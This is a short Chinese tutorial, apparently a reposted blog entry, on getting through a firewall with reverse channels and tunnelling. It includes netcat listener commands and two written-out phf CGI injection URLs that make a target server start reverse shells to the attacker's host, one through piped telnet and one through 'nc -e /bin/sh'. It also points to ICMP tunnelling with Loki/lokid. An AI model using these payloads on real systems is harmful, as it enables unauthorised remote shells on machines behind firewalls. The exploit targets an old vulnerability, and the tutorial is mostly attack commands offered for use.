利用反向通道与隧道技术透过firewall

来源:互联网 发布:edusoho 源码 编辑:程序博客网 时间:2024/05/16 01:48
1:反向通道技术
比如说一台为于firewall之后的服务器A(ip:ipA),我的机子为B(ip:ipB)。
firewall只允许到来的数据包到达A的80和25端口,其他
一切拒绝。
现在先在自己的机子上执行
[sztcww@haha sztcww]# nc -l -n -v -p 80
[sztcww@haha sztcww]# nc -l -n -v -p 25
假如在A的机子上找到这个phf漏洞(不过现在还能找到吗,呵呵,
所以只做参考用)。现在可以利用以下几个命令来得到一个真正的
SHELL(说它是真正的是因为phf的漏洞利用也可以称为一个SHELL了)。
/cgi-bin/phf?Qalias=x%0a/bin/telnet%20ipB%2080%20|%20/bin/sh%20|
                     %20/bin/telnet%20ipB%2025
相当于在A的机子上执行了
telnet ipB 80|sh|telnet ipB 25
这样就利用反向tlenet铲回一个shell.
为什么可以在B的机子上得到一个A的SHELL,如果不知道,请翻看一下
管道的作用。
如果在A的机子上可以找到nc的话,也可以这样。
在我B机子上:
[sztcww@haha sztcww]# nc -l -n -v -p 80
A上:
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-e%20/bin/sh%20ipB%2080

因为连接是从firewall之后的A服务器发起的,所以一般是能够通信的。

2:隧道技术
一般是利用ICMP封装真正的数据,也有UDP等其他的协议可以利用。
一般如果firewall不block icmp的话,就可以利用icmp隧道技术
与一台firewall之后的受害机子通信,也就是说可以得到
firewall之后的受害机子的一个SHELL。
关于这个更详细的讨论请参考Phrack的p49-6
可利用的工具有loki和lokid

防火墙(firewall)没有真正的接触过,这些都是书上看来的,不要告我抄袭就好哈,呵 
原创粉丝点击